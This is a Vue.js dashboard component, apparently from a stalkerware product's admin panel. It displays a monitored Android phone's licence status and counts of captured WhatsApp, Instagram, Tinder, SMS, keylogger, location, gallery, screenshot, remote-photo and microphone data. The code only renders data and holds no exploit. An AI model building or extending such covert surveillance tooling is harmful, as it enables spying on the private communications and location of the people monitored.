<template>
  <div class="vx-col w-full sm:w-1/2 lg:w-1/3 mb-base">
    <vx-card>
      <h2 :class="{'text-success': device.status === 'ACTIVE', 'text-danger': device.status !== 'ACTIVE'}">{{device.alias || device.device}}</h2>

      <div class="my-6">
        <vs-button
          icon-pack="feather"
          icon="icon-x-circle"
          color="danger"
          class="w-full"
          :disabled="true"
          v-if="device.status === 'TRIAL'"
        >Em Teste</vs-button>

        <vs-button
          icon-pack="feather"
          icon="icon-edit"
          color="success"
          class="w-full"
          v-else-if="device.status === 'ACTIVE'"
          @click="editLicence(device)"
        >Editar Licença</vs-button>

        <vs-button
          icon-pack="feather"
          icon="icon-x-circle"
          color="danger"
          class="w-full"
          :disabled="true"
          v-else
        >Excluído/Expirado</vs-button>
      </div>

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Situação</p>
        <p class="text-warning" v-if="device.status === 'TRIAL'">Em Teste</p>
        <p class="text-success" v-else-if="device.status === 'ACTIVE'">Ativo</p>
        <p class="text-danger" v-else>Excluído/Expirado</p>
      </div>
      <vs-divider />

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Licença Válida Até</p>
        <p v-if="device.licence_valid_until">{{device.licence_valid_until | formatDate}}</p>
        <p v-else>-</p>
      </div>
      <vs-divider />

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Cadastrado Em</p>
        <p>{{device.created_at | formatDateTime}}</p>
      </div>
      <vs-divider />

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Última Atualização</p>
        <p>{{device.updated_at | formatDateTime}}</p>
      </div>
      <vs-divider />

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Provedor</p>
        <p>{{device.provider || '-'}}</p>
      </div>
      <vs-divider />

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Android</p>
        <p>{{device.device}}</p>
      </div>
      <vs-divider />

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Versão</p>
        <p>{{device.version}}</p>
      </div>
      <vs-divider />

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Versão App</p>
        <p>{{device.apkversion}}</p>
      </div>
      <vs-divider />

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Bateria</p>
        <p>{{device.battery}}</p>
      </div>
      <vs-divider />

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Rede</p>
        <p>{{device.network || '-'}}</p>
      </div>
      <vs-divider></vs-divider>

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">GPS</p>
        <p class="text-success" v-if="device.gps == 1">Ativo</p>
        <p class="text-danger" v-else>Inativo</p>
      </div>
      <vs-divider></vs-divider>

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">WiFi</p>
        <p>{{device.wifi_ssid || '-'}}</p>
      </div>

      <div class="flex justify-between flex-wrap bg-primary text-white p-2 my-4">
        <p class="font-bold">REDES SOCIAIS</p>
      </div>

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">WhatsApp (Chat)</p>
        <p>Não Lido / Total</p>
      </div>
      <div class="flex justify-between flex-wrap">
        <p v-if="device.last_update_whatsapp">{{device.last_update_whatsapp | formatDateTime}}</p>
        <p v-else-if="device.last_update_messenger">{{device.last_update_messenger | formatDateTime}}</p>
        <p v-else>-</p>

        <p v-if="device.last_update_whatsapp">{{device.count_whatsapp}} / {{device.total_whatsapp || 0}}</p>
        <p v-else>{{device.count_messenger}} / {{device.total_messenger || 0}}</p>
      </div>
      <vs-divider></vs-divider>

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">WhatsApp (Áudio)</p>
        <p>Não Lido / Total</p>
      </div>
      <div class="flex justify-between flex-wrap">
        <p v-if="device.last_update_messengeraudio">{{device.last_update_messengeraudio | formatDateTime}}</p>
        <p v-else-if="device.last_update_whatsappaudio">{{device.last_update_whatsappaudio | formatDateTime}}</p>
        <p v-else>-</p>
        <p v-if="device.count_whatsappaudio">{{device.count_whatsappaudio}} / {{device.total_whatsappaudio || 0}}</p>
        <p v-else>{{device.count_messengeraudio}} / {{device.total_messengeraudio || 0}}</p>
      </div>
      <vs-divider></vs-divider>

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">WhatsApp (Chamadas)</p>
        <p>Não Lido / Total</p>
      </div>
      <div class="flex justify-between flex-wrap">
        <p v-if="device.last_update_whatsappcall">{{device.last_update_whatsappcall | formatDateTime}}</p>
        <p v-else>-</p>
        <p>{{device.count_whatsappcall}} / {{device.total_whatsappcall || 0}}</p>
      </div>
      <vs-divider></vs-divider>

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Instagram</p>
        <p>Não Lido / Total</p>
      </div>
      <div class="flex justify-between flex-wrap">
        <p v-if="device.last_update_instagram">{{device.last_update_instagram | formatDateTime}}</p>
        <p v-else>-</p>
        <p>{{device.count_instagram}} / {{device.total_instagram || 0}}</p>
      </div>
      <vs-divider></vs-divider>

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Badoo</p>
        <p>Não Lido / Total</p>
      </div>
      <div class="flex justify-between flex-wrap">
        <p v-if="device.last_update_badoo">{{device.last_update_badoo | formatDateTime}}</p>
        <p v-else>-</p>
        <p>{{device.count_badoo}} / {{device.total_badoo || 0}}</p>
      </div>
      <vs-divider></vs-divider>

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Kwai</p>
        <p>Não Lido / Total</p>
      </div>
      <div class="flex justify-between flex-wrap">
        <p v-if="device.last_update_kwai">{{device.last_update_kwai | formatDateTime}}</p>
        <p v-else>-</p>
        <p>{{device.count_kwai}} / {{device.total_kwai || 0}}</p>
      </div>
      <vs-divider></vs-divider>

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Snapchat</p>
        <p>Não Lido / Total</p>
      </div>
      <div class="flex justify-between flex-wrap">
        <p v-if="device.last_update_snapchat">{{device.last_update_snapchat | formatDateTime}}</p>
        <p v-else>-</p>
        <p>{{device.count_snapchat}} / {{device.total_snapchat || 0}}</p>
      </div>
      <vs-divider></vs-divider>

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Telegram</p>
        <p>Não Lido / Total</p>
      </div>
      <div class="flex justify-between flex-wrap">
        <p v-if="device.last_update_telegram">{{device.last_update_telegram | formatDateTime}}</p>
        <p v-else>-</p>
        <p>{{device.count_telegram}} / {{device.total_telegram || 0}}</p>
      </div>
      <vs-divider></vs-divider>

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Tinder</p>
        <p>Não Lido / Total</p>
      </div>
      <div class="flex justify-between flex-wrap">
        <p v-if="device.last_update_tinder">{{device.last_update_tinder | formatDateTime}}</p>
        <p v-else>-</p>
        <p>{{device.count_tinder}} / {{device.total_tinder || 0}}</p>
      </div>

      <div class="flex justify-between flex-wrap bg-primary text-white p-2 my-4">
        <p class="font-bold">MONITORAMENTO</p>
      </div>

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Aplicativos</p>
        <p>Não Lido / Total</p>
      </div>
      <div class="flex justify-between flex-wrap">
        <p v-if="device.last_update_app">{{device.last_update_app | formatDateTime}}</p>
        <p v-else>-</p>
        <p>{{device.count_app}} / {{device.total_app || 0}}</p>
      </div>
      <vs-divider></vs-divider>

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Chamadas</p>
        <p>Não Lido / Total</p>
      </div>
      <div class="flex justify-between flex-wrap">
        <p v-if="device.last_update_call">{{device.last_update_call | formatDateTime}}</p>
        <p v-else>-</p>
        <p>{{device.count_call}} / {{device.total_call || 0}}</p>
      </div>
      <vs-divider></vs-divider>

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Teclas</p>
        <p>Não Lido / Total</p>
      </div>
      <div class="flex justify-between flex-wrap">
        <p v-if="device.last_update_keylogger">{{device.last_update_keylogger | formatDateTime}}</p>
        <p v-else>-</p>
        <p>{{device.count_keylogger}} / {{device.total_keylogger || 0}}</p>
      </div>
      <vs-divider></vs-divider>

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Contatos</p>
        <p>Não Lido / Total</p>
      </div>
      <div class="flex justify-between flex-wrap">
        <p v-if="device.last_update_contact">{{device.last_update_contact | formatDateTime}}</p>
        <p v-else>-</p>
        <p>{{device.count_contact}} / {{device.total_contact || 0}}</p>
      </div>
      <vs-divider></vs-divider>

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Sites</p>
        <p>Não Lido / Total</p>
      </div>
      <div class="flex justify-between flex-wrap">
        <p v-if="device.last_update_webhistory">{{device.last_update_webhistory | formatDateTime}}</p>
        <p v-else>-</p>
        <p>{{device.count_webhistory}} / {{device.total_webhistory || 0}}</p>
      </div>
      <vs-divider></vs-divider>

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Pesquisas</p>
        <p>Não Lido / Total</p>
      </div>
      <div class="flex justify-between flex-wrap">
        <p v-if="device.last_update_websearch">{{device.last_update_websearch | formatDateTime}}</p>
        <p v-else>-</p>
        <p>{{device.count_websearch}} / {{device.total_websearch || 0}}</p>
      </div>
      <vs-divider></vs-divider>

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">SMS</p>
        <p>Não Lido / Total</p>
      </div>
      <div class="flex justify-between flex-wrap">
        <p v-if="device.last_update_sms">{{device.last_update_sms | formatDateTime}}</p>
        <p v-else>-</p>
        <p>{{device.count_sms}} / {{device.total_sms || 0}}</p>
      </div>
      <vs-divider></vs-divider>

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Localização</p>
        <p>Não Lido / Total</p>
      </div>
      <div class="flex justify-between flex-wrap">
        <p v-if="device.last_update_location">{{device.last_update_location | formatDateTime}}</p>
        <p v-else>-</p>
        <p>{{device.count_location}} / {{device.total_location || 0}}</p>
      </div>
      <vs-divider></vs-divider>

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Galeria</p>
        <p>Não Lido / Total</p>
      </div>
      <div class="flex justify-between flex-wrap">
        <p v-if="device.last_update_photogallery">{{device.last_update_photogallery | formatDateTime}}</p>
        <p v-else>-</p>
        <p>{{device.count_photogallery}} / {{device.total_photogallery || 0}}</p>
      </div>
      <vs-divider></vs-divider>

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Captura de Tela</p>
        <p>Não Lido / Total</p>
      </div>
      <div class="flex justify-between flex-wrap">
        <p v-if="device.last_update_screenshot">{{device.last_update_screenshot | formatDateTime}}</p>
        <p v-else>-</p>
        <p>{{device.count_screenshot}} / {{device.total_screenshot || 0}}</p>
      </div>
      <vs-divider></vs-divider>

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Foto Remota</p>
        <p>Não Lido / Total</p>
      </div>
      <div class="flex justify-between flex-wrap">
        <p v-if="device.last_update_remotephoto">{{device.last_update_remotephoto | formatDateTime}}</p>
        <p v-else-if="device.last_update_photo">{{device.last_update_photo | formatDateTime}}</p>
        <p v-else>-</p>

        <p v-if="device.last_update_remotephoto">{{device.count_remotephoto}} / {{device.total_remotephoto || 0}}</p>
        <p v-else-if="device.last_update_photo">{{device.count_photo}} / {{device.total_photo || 0}}</p>
        <p v-else>-</p>
      </div>
      <vs-divider></vs-divider>

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Microfone</p>
        <p>Não Lido / Total</p>
      </div>
      <div class="flex justify-between flex-wrap">
        <p v-if="device.last_update_microphone">{{device.last_update_microphone | formatDateTime}}</p>
        <p v-else>-</p>
        <p>{{device.count_microphone}} / {{device.total_microphone || 0}}</p>
      </div>
      <vs-divider />

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Zona Segura</p>
      </div>
      <div class="flex justify-between flex-wrap">
        <div v-if="!device.safezone">Não configurada</div>
        <div v-else>Atenção: Somente a primeira coordenada é mostrada, não a zona demarcada.</div>
        <p v-if="device.safezone">
          <a :href="`https://www.google.com/maps?q=${JSON.parse(device.safezone)[0].lat},${JSON.parse(device.safezone)[0].lng}`" target="_blank">{{JSON.parse(device.safezone)[0].lat}},{{JSON.parse(device.safezone)[0].lng}}</a>
        </p>
      </div>
      <vs-divider />

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">UID</p>
        <p>{{device.uid}}</p>
      </div>
      <vs-divider />

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">SDK</p>
        <p>{{device.sdk}}</p>
      </div>
      <vs-divider />

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">IP</p>
        <p>{{device.ip}}</p>
      </div>
      <vs-divider></vs-divider>

      <div class="flex justify-between flex-wrap">
        <p class="font-bold">Excluído</p>
        <p v-if="device.deleted == 1">Sim</p>
        <p v-else>Não</p>
      </div>
      <vs-divider v-if="device.deleted == 1"></vs-divider>

      <div class="flex justify-between flex-wrap" v-if="device.deleted == 1">
        <p class="font-bold">Excluído Em</p>
        <p>{{device.deleted_at | formatDateTime}}</p>
      </div>

    </vx-card>
  </div>
</template>

<script>
export default {
  props: ['device', 'editLicence']
};
</script>
